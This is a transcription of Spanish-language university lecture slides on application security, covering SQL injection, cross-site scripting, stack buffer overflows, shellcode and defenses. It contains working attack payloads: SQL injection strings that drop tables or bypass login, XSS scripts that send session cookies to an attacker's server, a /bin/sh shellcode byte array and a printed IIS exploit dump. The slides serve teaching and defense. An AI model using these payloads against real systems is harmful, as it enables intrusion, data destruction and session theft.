Seguridad a nivel aplicaciones

Transcripción

1 Seguridad a nivel aplicaciones Principales ataques Roberto Gómez rogomez@itesm.mx Lámina 1 C. Mecanismos de seguridad Firewalls IDS (Sistemas de Detección de Intrusos) Filtrado de información Lámina 2 C. Seguridad en Aplicaciones 1

2 Sin embargo Empresas necesitan dar servicios al exterior. Existe un puerto que siempre esta abierto Lámina 3 C. Inyección SQL o cuidado con lo que el usuario introduce Lámina 4 C. Seguridad en Aplicaciones 2

3 SQL Injection Structured Query Languaje (SQL) es un lenguaje textual usado para interactuar con bases de datos relacionales las instrucciones SQL pueden modificar la estructura de las bases de datos (usando instrucciones Data Definition Language, o DDL) y manipular el contenido de las bases de datos La Inyección SQL ocurre cuando un atacante puede introducir una serie de instrucciones SQL en una consulta manipulando datos de entrada dentro de una aplicación. Aplicada a la popular plataforma Microsoft Internet Information Server/Active Server Pages/SQL Server Lámina 5 C. Ejemplo Una típica instrucción SQL sería esta: select id, forename, surname from authors esta instrucción devolverá el id, forename y surename de las columnas de la tabla authors, devolviendo todas las filas de la tabla, El result set podría ser filtrado a un autor especifico author como esto: select id, forename, surname from authors where forename = john and surname = smith Lámina 6 C. Seguridad en Aplicaciones 3

4 Detalles Cadenas john y smith delimitadas por comillas simples. Suponiendo que los campos siendo recogidos por un formulario de entrada de datos, un atacante podría inyectar SQL en esta consulta, introduciendo valores como: El query string es: Resultado Forename: jo hn Surname: smith select id, forename, surname from authors where forename = jo hn and surname = smith Server: Msg 170, Level 15, State 1, Line1 Line 1: Incorrect syntax near hn. Lámina 7 C. SQL + Página Web Pagina con un formulario login en un Active Server Pages (ASP), accede a una base de datos SQL Server y autentifica el acceso a una aplicación ficticia. Dentro de la página el usuario introduce los datos de username y password Username: Password: Lámina 8 C. Seguridad en Aplicaciones 4

5 Punto crítico código El punto critico de esta parte del proceso de la pagina process_login.asp es cuando crea la consulta de cadena: var sql = select * from users where username = + username + and password = + password + ; Un usuario puede especificar lo siguiente: Username: ; drop table users -- Password: La tabla será borrada Lámina 9 C. Otras opciones El atacante puede entrar como cualquier usuario, tomando nombres de usuario conocidos, usando la siguiente entrada Username: admin -- El atacante puede entrar como el primer usuarios de la tabla users, con la siguiente entrada Username: or 1=1 -- El atacante puede introducirse con un usuario ficticio usando la siguiente entrada Username: union select 1, usuario_ficticio, algun_password, 1 -- Lámina 10 C. Seguridad en Aplicaciones 5

6 Obteniendo información mensajes error Técnica descubierta por David Litchfield Para manipular los datos de la base de datos, determinar estructura base de datos y tablas. Por ejemplo, tabla users creada con el siguiente comando: Create table users(id int, Username varchar(255), Password varchar(255), Privs int) los siguientes usuarios users insertados insert into users values( 0, admin, r00tr0x!, 0xffff) insert into users values( 0, guest, guest, 0x0000) insert into users values( 0, chris, password, 0x00ff) insert into users values( 0, fred, sesame, 0x00ff ) Lámina 11 C. Obteniendo nombres tablas Atacante usa la cláusula having de la instrucción select : Username: having 1=1 -- Esto provoca el siguiente error: Microsoft OLE DB Provider for ODBC Drivers error 80040e14 [Microsoft][ODBC SQL Server Driver][SQL Server] Column users.id is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /process_login.asp, line 35 Lámina 12 C. Seguridad en Aplicaciones 6

7 Averiguando todas las columnas Atacante puede averiguar todas las columnas introduciendo cada campo dentro de una cláusula group by, como sigue: Username: group by users.id having 1=1 -- Microsoft OLE DB Provider for ODBC Drivers error 80040e14 [Microsoft][ODBC SQL Server Driver][SQL Server] Column users.username is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /process_login.asp, line 35 Lámina 13 C. Determinando tipo cada columna Puede ser conseguido usando un mensaje de error type conversion, como: Username: union select sum(username) from users -- Servidor SQL intenta aplicar la cláusula sum y duda determinando si el numero de campos en las dos filas es igual. cuando calcula el sum de un campo textual resulta en un mensaje de error Lámina 14 C. Seguridad en Aplicaciones 7

8 Mensaje de error Microsoft OLE DB Provider for ODBC Drivers error 80040e07 [Microsoft][ODBC SQL Server Driver][SQL Server] The sum or average aggregate operation cannot take a varchar data type as an argument. /process_login.asp, line 35 Lo que nos dice es que el campo username tiene tipo varchar Es posible usar esta técnica para determinar aproximadamente el tipo de cualquier columna de cualquier tabla en la base de datos Lámina 15 C. Consecuencias Permite al atacante crear una buena consulta insert como esta: Username: ; insert into users values( 666, attacker, foobar, 0xffff) -- El poder de esta técnica no acaba aquí. El atacante puede tomar ventaja de los mensajes de error que revelan información sobre la base de datos. Una lista de mensajes de error estándar puede ser obtenida de la siguiente forma: select * from master..sysmessages Lámina 16 C. Seguridad en Aplicaciones 8

9 Eliminando comillas simples Los desarrolladores pueden tener protegida una aplicación por (digamos) eliminar todas las comillas simples ( ). Function escap( input ) Input = replace(input,, ) Escape = input End function Esto prevendría todos los ataques de los ejemplos anteriores, y eliminando el punto y coma ; nos ayudaría mas. Lámina 17 C. Dando la vuelta Posible crear una cadena sin utilizar comillas simples, puede usar la función char. Por ejemplo: Insert into users values (666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff) Es una consulta que no contiene comillas simples, pero insertara cadenas en una tabla Lámina 18 C. Seguridad en Aplicaciones 9

10 Cross Site Scripting o lo que es lo mismo... cuidado con lo que sale y con lo que entra Lámina 19 C. Ataque XSS El problema reside en la administración de archivos adjuntos de tipo.html o.htm Manejar la salida de una aplicación web es lo mismo que pasar datos a los subsistemas el subsistema final al que se le pasa datos es el browser del visitante y el parser HTML en el browser solo es otro sistema cuando se envían datos a él se debe poner atención a los metacaracteres Problema notificado por CERT en el Lámina 20 C. Seguridad en Aplicaciones 10

11 Por qué XSS y no CSS? XSS: evitar confusiones con Cascading Style Sheets Ataque a través de un enlace que apunta a un servidor web afectado. URL se construye para que incluya un script del atacante que será transmitido por el servidor afectado al cliente que utilice el enlace para visitar el web. Por ejemplo, sitio web permite realizar búsquedas El XSS podría darse a través de una URL tipo: Lámina 21 C. Empecemos por lo sencillo Aplicación web: guest book permite visitantes introducir lo que dessen y solo añaden el nuevo texto a lo que estaba antes Usuario malicioso introduce lo siguiente: <!-- Nada pasa al principio, pero se mezcla con lo que se escribió y lo que se escribirá, aplicación web pasará lo siguiente a lectores libro de visitas: : Cool web page, dude! <!-- You re da man, boss : Lámina 22 C. Seguridad en Aplicaciones 11

12 Otros dos ejemplos Posible introducir: <script> for (q=0; q < 1000; q++) window.open( </script> Otro ejemplo un sitio de discusión para niños el sitio carece de filtrado hacia afuera, y alguien introduce lo siguiente: <imag src = Lámina 23 C. Secuestro de sesión 1 atacante inyecta script en el servidor y espera por una víctima 3 script se ejecuta en el browser de la víctima, y le envía la cookie de sesión al atacante 4 atacante pasa la cookie robada, provocando que el servidor piense que es la víctima servidor envía una cookie sesión y el script del atacante al visitante Lámina 24 C. 2 Seguridad en Aplicaciones 12

13 Algo de código JavaScript proporciona cookie al web server del atacante <script> document.location.replace( + =?what= + document.cookie) </script> Enviando el browser al sitio original <script> if (document.cookie.indexof( stolen ) < 0 { document.cookie = stolen=true ; document.location.replace( + =?what= + document.cookie + = &whatnext= ) } </script> Lámina 25 C. Otros ataques XSS Modificación texto posible cambiar información mientras la página es desplegada XSS con ingeniería social script malicioso no es almacenado en el servidor atacante engaña a la víctima, para que este se dirija a un URL con el scripto malicioso Robo de passwords algunos sitios vuelven a desplear el user-name si la autenticación falla, considerando que el password fue mal tecleado Lámina 26 C. Seguridad en Aplicaciones 13

14 Ejemplo de ingeniería social Lámina 27 C. El stack o buffer overflow atacando la aplicación a través de un exploit Lámina 28 C. Seguridad en Aplicaciones 14

15 El stack o buffer overflow Se dan a conocer los detalles de dicho ataque en noviembre 1996 (Phrack Magazine, número 49). Smashing The Stack For Fun And Profit Se produce una situación de desbordamiento del búfer cuando un usuario o un proceso intenta introducir en el búfer más datos de los originalmente permitidos. Aprovechando esta situación se puede conseguir acceder fraudulentamente al sistema. Lámina 29 C. La vulnerabilidad Un stack overflow es una vulnerabilidad que se ocasiona porque el programador no presto atención o no se dio cuenta que la gente podía pasar mas información de la que en su variable cabía Fueron descubiertos a principios de los ochenta, pero no fue hasta 1988 cuando el worm de Internet llamado "morris" le informo del peligro de estos errores de seguridad a la gente Objetivo contar con una shell con los privilegios con que se esta ejecutando la aplicación que presenta la vulnerabilidad Lámina 30 C. Seguridad en Aplicaciones 15

16 Contexto de un proceso direcciones altas de memoria direcciones bajas de memoria stack heap datos no inicializados datos inicializados READ-WRITE datos inicializados READ-ONLY TEXTO (código) Datos dinámicos del programa Datos estáticos del programa Código del programa Lámina 31 C. Ejemplo stack dirección crecimiento stack User Stack Local not Vars shown Addr of frame 2 (resultado) Ret addr after write call parms to news buffer write count Local Vars count Addr of frame 1 (resultado) Ret addr after copy call parms to old new copy Local fdold Vars fdnew Addr of frame 0 Ret addr after main call parms to argc main argv copy (int old, int new) { int count; while ( (count = read(old, buffer, sizeof(buffer))) > 0 ) write(new, buffer, count); } main(argc, argv) { int fdold, fdnew; fdold = open(argv[1], O_RDONLY]); fdnew = open(argv[2], 0666); copy (fdold, fdnew); exit(0); } Lámina 32 C. Seguridad en Aplicaciones 16

17 Un primer ejemplo cat prog1 int main(int argv,char **argc) { char buf[25]; } strcpy(buf,argc[1]); toto@cachafas:2> gcc prog1.c -o prog1 toto@cachafas:3> prog1 esto es una prueba de un buffer overflow???????????????????????????? qué pasa si en lugar de strcpy() se usa strncpy()?? Lámina 33 C. Otro ejemplo voidfunction(inta, intb, intc) { char buffer1[5]; char buffer2[10]; } void main() { function(1,2,3); } Lámina 34 C. Seguridad en Aplicaciones 17

18 Foto del stack Parte baja memoria D3 D4 D5 D6 D7 D8 D9 DA DB DC DE DF E0 E1 E2 E3 E4 E5 E6 E8 E9 EA EB buffer2[10] buffer1[5] Parte alta stack EC ED EE EF F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF Parte alta memoria sfp = ebp ret = IP a b c Parte baja stack Lámina 35 C. Segundo ejemplo void function(char *str) { char buffer[16]; strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); } Lámina 36 C. Seguridad en Aplicaciones 18

19 Foto del stack Parte baja memoria E3 E4 Parte alta stack E5 E6 E8 E9 EA EB EC buffer[16] ED EE EF F0 F1 F2 F3 F4 F5 F6 sfp F7 F8 F9 FA ret FB FC FD Parte alta memoria FE *str Parte baja stack FF Lámina 37 C. Ejecutando el código prog2.c -o prog Bus error (core dumped) Lámina 38 C. Seguridad en Aplicaciones 19

20 Qué paso? Parte baja memoria E3 E4 Parte alta stack E5 E6 E8 E9 EA EB EC buffer[16] ED EE EF F0 F1 F2 F3 F4 F5 F6 sfp F7 F8 F9 FA ret FB FC FD Parte alta memoria FE *str Parte baja stack FF Lámina 39 C. Qué paso? Parte baja memoria E3 E4 E5 E6 E8 E9 EA EB EC ED EE EF F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA A A A A A A A Parte alta stack FB FC FD Parte alta memoria FE Parte baja stack FF Lámina 40 C. Seguridad en Aplicaciones 20

21 Otro ejemplo void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; ret = buffer1 + 12; (*ret) += 8; } void main( ) { int x; x = 0; function(1,2,3); x = 1; printf("%d\n",x); } toto@cachafas:4> gcc prog2.c -o prog2 toto@cachafas:5> prog2 0 toto@cachafas:6> Lámina 41 C. Siguiendo el stack Parte baja memoria D2 D3 D4 D5 D6 D7 D8 D9 DA DB DC DE DF E0 E1 E2 E3 E4 E5 E6 E8 E9 EA EB *ret buffer2[10] buffer1[5] Parte alta stack EC ED EE EF F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF Parte alta memoria sfp RET=FF a b c Parte baja stack Lámina 42 C. Seguridad en Aplicaciones 21

22 Siguiendo el stack Parte baja memoria D2 D3 D4 D5 D6 D7 D8 D9 DA DB DC DE DF E0 E1 E2 E3 E4 E5 E6 E8 E9 EA EB *ret=e3+12 buffer2[10] buffer1[5] Parte alta stack EC ED EE EF F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF Parte alta memoria sfp RET=FF a b c Parte baja stack Lámina 43 C. Siguiendo el stack Parte baja memoria D2 D3 D4 D5 D6 D7 D8 D9 DA DB DC DE DF E0 E1 E2 E3 E4 E5 E6 E8 E9 EA EB *ret=e3+12 buffer2[10] buffer1[5] Parte alta stack EC ED EE EF F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF Parte alta memoria sfp RET=FF+8 a b c Parte baja stack Lámina 44 C. Seguridad en Aplicaciones 22

23 Por que sumar 8 Cuando se llama a function() RET vale 0x8004a8 Se desea saltarse la asignación en 0x80004ab La instrucción a ejecutar esta en 0x8004b2 Por lo que la distancia a saltar es de 8 0x80004a3 <main+19>: call 0x <function> 0x80004a8 <main+24>: addl $0xc,%esp 0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp) 0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax 0x80004b5 <main+37>: pushl %eax 0x80004b6 <main+38>: pushl $0x80004f8 Lámina 45 C. El payload Código proporcionado por el atacante como parte de la información extra. esta información extra se conoce como payload. La parte difícil es encontrar una dirección donde alojar al payload Posibles acciones del payload modifique algún valor el registro de Windows, dar de alta un usuario en el archivo /etc/password de un sistema Unix, abrir el compartimiento de CDs de la computadora. Muchas veces se confunde el payload con un shellcode. Lámina 46 C. Seguridad en Aplicaciones 23

24 Los shellcodes Son fragmentos de código escritos en lenguaje ensamblador que ejecutan una serie de ordenes comunicándose directamente con el kernel, es decir, usando llamadas al sistema. Se usa para conseguir ejecutar un código después de haber sobreescrito la dirección de retorno de un programa/función mediante un overflow, o mediante cualquier otro método válido es decir, el valor de la dirección de retorno que se sobreescribira será la de nuestra shellcode. El proceso, consiste en copiar el código de shell en el espacio de variables locales Lámina 47 C. Ejemplo de un shellcode #include <stdio.h> void main() { char *name[2]; } name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); Lámina 48 C. Seguridad en Aplicaciones 24

25 Ejecutando el shellcode Se aprovecha que Linux permite la ejecución de código contenido en la sección de la pila, esta marcada con los bits de lectura, escritura y ejecución. Se sobrescribe RET con la dirección de la shellcode, de manera que cuando el programa salga de la función principal, main(), el programa salte al código shell, ejecutando aquellas operaciones que contenga En la actualidad hay exploits que utilizan desde los shellcodes mas simples hasta los mas complejos, desde los mas grandes hasta los mas chicos, usan criptografía, NOPS-free, shellcodes polimorficos, ofuscados, etc. Lámina 49 C. Ejemplo de shellcode char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46" "\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3" "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00" "\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; int main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } Lámina 50 C. Seguridad en Aplicaciones 25

26 Resumiendo Cadena con 120 caracteres A stack RET EBP Buffer 100 bytes stack 0x x02fe4f0a 0x x0050a78f Cadena con SHELL CODE El código ASCII de A es 41 stack RET EBP Buffer 100 bytes stack 0x02fe4f0a 0x02fe4f0a 0x02fe4f0a 0x02fe4f0a Código en NOPs Ensamblador (ejecuta SH o ejecuta cmd.exe) Lámina 51 C. El exploit Del inglés to exploit, explotar, aprovechar. Es el nombre con el que se identifica un programa informático malicioso, o parte del programa, que trata de forzar alguna deficiencia o vulnerabilidad de otro programa (llamadas bugs). El fin puede ser la destrucción o inhabilitación del sistema atacado, aunque normalmente se trata de violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de otros ataques a terceros. Lámina 52 C. Seguridad en Aplicaciones 26

27 El ataque exploit root stack de la aplicación Lámina 53 C. HEAD / HTTP/1.0 HTTP/ OK Content-Length: 2506 Date: Mon, 01 Oct :04:41 GMT Content-Location: Content-Type: text/html Server: Microsoft-IIS/5.0 Accept-Ranges: bytes Last-Modified: Mon, 01 Oct :06:52 GMT ETag: "20c1bf347cfc01:941" Connection closed by foreign host. hacker.com:~$./idaexploit.sh Connecting... Dumping Shell: \x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x= 1c\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90\xac\= x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c= \x6b\xbd\xd9\x99\x14\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4= \xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9\x99\xcf\x14\x2c\x6= 8\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x= 99\x99\x14\x2c\x6c\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf\= xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf\xd9\x99\x34\xc9\x66= Lámina 54 C. Seguridad en Aplicaciones 27

28 Y que se hace? Búsqueda datos víctima Búsqueda puertas/ventanas abiertas máquina Averiguar el sistema operativo y la versión de este. Alguna puerta/ventana abierta presenta alguna vulnerabilidad? Existe algún exploit relacionado con la vulnerabilidad y la versión del sistema operativo de la víctima? Bajar el exploit e instalarlo. Ejecutarlo para llevar a cabo el ataque. Lámina 55 C. Herramientas Metasploit Framework Herramienta gratuita Escrita en PERL CORE IMPACT $25K por año Escrita en Python y C++ Immunitysec CANVAS Menos extensa que CORE IMPACT Mucho más barata: $1300 Lámina 56 C. Seguridad en Aplicaciones 28

29 Otros exploits relacionados Bugs de Formato cualquier función que tome un formato como argumento es vulnerable a un tipo de buffer overflow llamado format string overflow (overflow de cadena de formato). Mal manejo de enteros Integer overflow and underflow conditions Integer comparisons Precision and promotion errors Stack Memory Overflowing Force Memory Leak Off by one Lámina 57 C. Técnicas prevención vulnerabilidades Revisión código fuente source code auditing proyecto OpenBSD herramientas: ITS4, RATS y LCLint lista herramientas: sardonix.org/auditing_resources.html. Modificando el compilador añadir detección buffer overflow de forma automática a un programa usando un compilador modificado ejemplo: StackGuard, ProPolice, StackShield y Return Address Defender (RAD). Lámina 58 C. Seguridad en Aplicaciones 29

30 Técnicas prevención vulnerabilidades Modificación sistema operativo modificando algunos aspectos del sistema operativo modificar el segmento del stack de tal forma que no sea ejecutable librería: Libsafe: intercepta llamadas a funciones vulnerables y ejecuta una versión segura de la llamadas. Modificación hardware tecnicas deteccion afectan desempeño (4% a 1,000%) mover operaciones de software a hardware propuesta SmashGuard proposal [10] uses a modification of the microcoded instructions for the CALL and RET opcodes in a CPU to enable transparent protection against buffer overflow attacks. Lámina 59 C. Y cómo nos protegemos? La mejor solución es usar funciones que tengan en cuenta el numero de bytes que se escriben. Tabla relaciona funciones vulnerables con la función que debería ser usada en su lugar. Función vulnerable get(s) strcpy() sprintf() getc() getchar() Reemplazar por sscanf() strncpy() snprintf() pueden ser especialmente vulnerables usadas en un ciclo Lámina 60 C. Seguridad en Aplicaciones 30

31 Seguridad a nivel aplicaciones Principales ataques Roberto Gómez rogomez@itesm.mx Lámina 61 C. Seguridad en Aplicaciones 31